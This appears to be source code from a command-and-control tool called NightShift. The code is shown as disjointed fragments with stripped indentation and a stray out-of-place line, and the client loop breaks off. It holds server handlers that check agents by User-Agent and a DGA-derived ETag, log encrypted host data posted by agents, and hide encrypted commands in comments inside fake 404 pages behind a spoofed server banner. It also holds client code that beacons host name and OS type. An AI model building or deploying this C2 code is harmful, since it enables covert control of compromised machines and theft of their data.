async def Init_Output(request):
ns_get_config = nc_server_config()
ns_cpost_ua = ns_get_config[1]
time_stamp = datetime.now()
ns_get_key = NightShift_DGA()
ns_get_cipher = NightShift_Cipher()
ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
ns_hsh_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
ns_hdr = request.headers
ns_rmt_ip = request.remote
ns_resp_data = await request.read()
ns_ua_chk = ns_hdr.get('User-Agent')
ns_et_chk = ns_hdr.get('ETag')
if (ns_ua_chk == ns_cpost_ua and ns_et_chk == ns_hsh_key):
ns_resp_data = ns_resp_data.decode('ascii')
ns_post_log2file = ns_get_cipher.decrypt(ns_resp_data)
ns_server_log(ns_post_log2file)
print(
'[+] {0:s} --> New agent initialized. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.Response(
text='Initialization Complete, welcome to the nightshift.',
headers={'Server': 'LiteSpeed 3.13.37'})
else:
print(
'[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.Response(text='Ahhhh, what\'s going on?')
async def FourOFour(request):
ns_get_config = nc_server_config()
ns_cget_ua = ns_get_config[0]
ns_rdrct_url = ns_get_config[7]
time_stamp = datetime.now()
ns_get_key = NightShift_DGA()
ns_get_cipher = NightShift_Cipher()
ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
ns_hsh_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
ns_hdr = request.headers
ns_rmt_ip = request.remote
ns_ua_chk = ns_hdr.get('User-Agent')
ns_et_chk = ns_hdr.get('ETag')
if (ns_ua_chk == ns_cget_ua and ns_et_chk == ns_hsh_key):
print(
'[+] {0:s} --> A Nightshift Agent has requested payload. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
ns_cmd_path = "./conf/ns_fof_cmd.json"
ns_custom_fof_path = './conf/ns_custom_fof.txt'
with open(ns_cmd_path, 'r') as ns_cmd_f:
ns_cmd_f = ns_cmd_f.read()
ns_cipher_cmd = ns_get_cipher.encrypt(ns_cmd_f)
with open(ns_custom_fof_path, 'r') as ns_custom_fof_f:
ns_custom_fof_f = ns_custom_fof_f.read()
ns_custom_fof_f += '<!--HTMLDOC:' + ns_cipher_cmd + 'HTMLDOC>'
return web.HTTPNotFound(text=ns_custom_fof_f, content_type="text/html")
else:
print(
'[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.HTTPFound(ns_rdrct_url)
async def Post_Output(request):
time_stamp = datetime.now()
ns_get_config = nc_server_config()
ns_cpost_ua = ns_get_config[1]
ns_get_key = NightShift_DGA()
ns_get_cipher = NightShift_Cipher()
ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
ns_hsh_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
ns_hdr = request.headers
ns_rmt_ip = request.remote
ns_resp_data = await request.read()
ns_ua_chk = ns_hdr.get('User-Agent')
ns_et_chk = ns_hdr.get('ETag')
if (ns_ua_chk == ns_cpost_ua and ns_et_chk == ns_hsh_key):
ns_resp_data = ns_resp_data.decode('ascii')
ns_decrypted_data = ns_get_cipher.decrypt(ns_resp_data)
ns_post_log2file = {
"time": str(time_stamp),
"ns_client_ip": ns_rmt_ip,
"ns_post_data": ns_decrypted_data
}
ns_server_log(ns_post_log2file)
print(
'[+] {0:s} --> A Nightshift Agent has responded with it data output Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.Response(text='NightShift hours recorded',
headers={'Server': 'LiteSpeed 3.13.37'})
else:
print(
'[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.Response(text='Ahhhh, what\'s going on?')
async def ns_init_call(self, ns_init_json_path, ns_getua_data,
ns_postua_data, ns_initsite_data,
ns_initsitep_data):
ns_get_key = NightShift_DGA()
ns_get_cipher = NightShift_Cipher()
# Host Info
ns_host_name_f = socket.gethostname()
ns_os_type_f = os.name
ns_host_os_to_hash = str(ns_host_name_f + ns_os_type_f)
ns_host_os_hashed_f = ns_get_cipher.hash_keys_hosts(ns_host_os_to_hash)
# Server Contact Info
ns_comms_chk_url = ns_initsite_data
ns_post_url = ns_initsitep_data
ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
ns_hash_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
ns_comms_hdr = {'User-Agent': ns_getua_data, 'ETag': ns_hash_key}
ns_post_hdr = {'User-Agent': ns_postua_data, 'ETag': ns_hash_key}
try:
async with aiohttp.ClientSession(trust_env=True) as session:
async with session.get(ns_comms_chk_url,
headers=ns_comms_hdr) as response:
ns_comms_html = await response.text()
if ns_comms_html == 'Test Sucessful':
ns_init_f = True
ns_init_config_f = {
"host_data": {
"os_type": ns_os_type_f,
"host_name": ns_host_name_f,
"ns_init": ns_init_f
},
"host_hash": ns_host_os_hashed_f
}
ns_post_data = ns_get_cipher.encrypt(str(ns_init_config_f))
async with session.post(ns_post_url,
headers=ns_post_hdr,
data=ns_post_data) as response:
ns_post_init_html = await response.text()
else:
ns_init_f = False
ns_init_config_f = {
"host_data": {
"os_type": ns_os_type_f,
"host_name": ns_host_name_f,
"ns_init": ns_init_f
},
"host_hash": ns_host_os_hashed_f
}
with open(ns_init_json_path, 'w') as ns_init_w:
json.dump(ns_init_config_f, ns_init_w)
except aiohttp.client_exceptions.ClientConnectorError:
ns_init_f = False
print(
'[+] {0} --> NightShift Server connection to configured port is unavailable.'
.format(str(datetime.now())),
file=sys.stderr)
response = list(
(ns_init_f, ns_host_os_hashed_f, ns_os_type_f, ns_host_name_f))
return response
async def FourOFour(self, ns_get_ua, ns_fof_url):
async with aiohttp.ClientSession() as session:
ns_url = ns_fof_url
ns_get_key = NightShift_DGA()
ns_get_cipher = NightShift_Cipher()
ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
ns_hsh_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
ns_hdrs = {'User-Agent': ns_get_ua, 'ETag': ns_hsh_key}
try:
async with session.get(ns_url, headers=ns_hdrs) as response:
ns_fof_html = await response.text()
except Exception as e:
ns_fof_html = str(e)
return ns_fof_html
async def CommsCheck(request):
ns_get_config = nc_server_config()
ns_cget_ua = ns_get_config[0]
ns_rdrct_url = ns_get_config[7]
time_stamp = datetime.now()
ns_get_key = NightShift_DGA()
ns_get_cipher = NightShift_Cipher()
ns_hdr_key = ns_get_key.ns_dga_algorithm('key')
ns_hsh_key = ns_get_cipher.hash_keys_hosts(ns_hdr_key)
ns_hdr = request.headers
ns_rmt_ip = request.remote
ns_ua_chk = ns_hdr.get('User-Agent')
ns_et_chk = ns_hdr.get('ETag')
if (ns_ua_chk == ns_cget_ua and ns_et_chk == ns_hsh_key):
print(
'[+] {0:s} --> New agent coming online. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.Response(text='Test Sucessful',
headers={'Server': 'LiteSpeed 3.13.37'})
else:
print(
'[+] {0:s} --> Someone knocking but does not have the goods. Remote IP: {1:s} UserAgent: {2:s}'
.format(str(time_stamp), ns_rmt_ip, ns_ua_chk))
return web.HTTPFound(ns_rdrct_url)
output_b64 = base64.b64encode(bytes(output, 'utf-8')).decode('ascii')
return time_stamp, output_b64
if __name__ == "__main__":
print(Fore.GREEN + r"""
╔═╗─╔╗───╔╗─╔╗╔═══╦╗───╔═╦╗──╔══╗─────────────────╔╗╔╗─────╔═╗╔═╗──╔╗──────╔╗─╔╗─╔═══╗╔╗
║║╚╗║║───║║╔╝╚╣╔═╗║║───║╔╝╚╗─║╔╗║────────────────╔╝╚╣║─────║║╚╝║║──║║──────║║╔╝╚╗║╔═╗║║║
║╔╗╚╝╠╦══╣╚╩╗╔╣╚══╣╚═╦╦╝╚╗╔╬╗║╚╝╚╦╗╔╦═╦═╗╔╦═╗╔══╗╚╗╔╣╚═╦══╗║╔╗╔╗╠╦═╝╠═╗╔╦══╣╚╩╗╔╝║║─║╠╣║
║║╚╗║╠╣╔╗║╔╗║║╚══╗║╔╗╠╬╗╔╣║╚╝║╔═╗║║║║╔╣╔╗╬╣╔╗╣╔╗║─║║║╔╗║║═╣║║║║║╠╣╔╗║╔╗╬╣╔╗║╔╗║║─║║─║╠╣║
║║─║║║║╚╝║║║║╚╣╚═╝║║║║║║║║╚╦╗║╚═╝║╚╝║║║║║║║║║║╚╝║─║╚╣║║║║═╣║║║║║║║╚╝║║║║║╚╝║║║║╚╗║╚═╝║║╚╗
╚╝─╚═╩╩═╗╠╝╚╩═╩═══╩╝╚╩╝╚╝╚═╩╝╚═══╩══╩╝╚╝╚╩╩╝╚╩═╗║─╚═╩╝╚╩══╝╚╝╚╝╚╩╩══╩╝╚╩╩═╗╠╝╚╩═╝╚═══╩╩═╝
──────╔═╝║───────────────────────────────────╔═╝║───────────────────────╔═╝║ Client
──────╚══╝───────────────────────────────────╚══╝───────────────────────╚══╝ version 0.9
""")
ns_get_cipher = NightShift_Cipher()
ns_client = NightShift_Client()
ns_init_chkr = NightShift_Init_Check().ns_init_check()
ns_initchk_tf = ns_init_chkr[0]
ns_host_hash = ns_init_chkr[1]
ns_host_os = ns_init_chkr[2]
ns_host_name = ns_init_chkr[3]
ns_fof_url = ns_init_chkr[4]
ns_post_url = ns_init_chkr[5]
ns_get_ua = ns_init_chkr[6]
ns_post_ua = ns_init_chkr[7]
loop = asyncio.get_event_loop()
while True:
try:
ns_fof_html = loop.run_until_complete(
ns_client.FourOFour(ns_get_ua, ns_fof_url))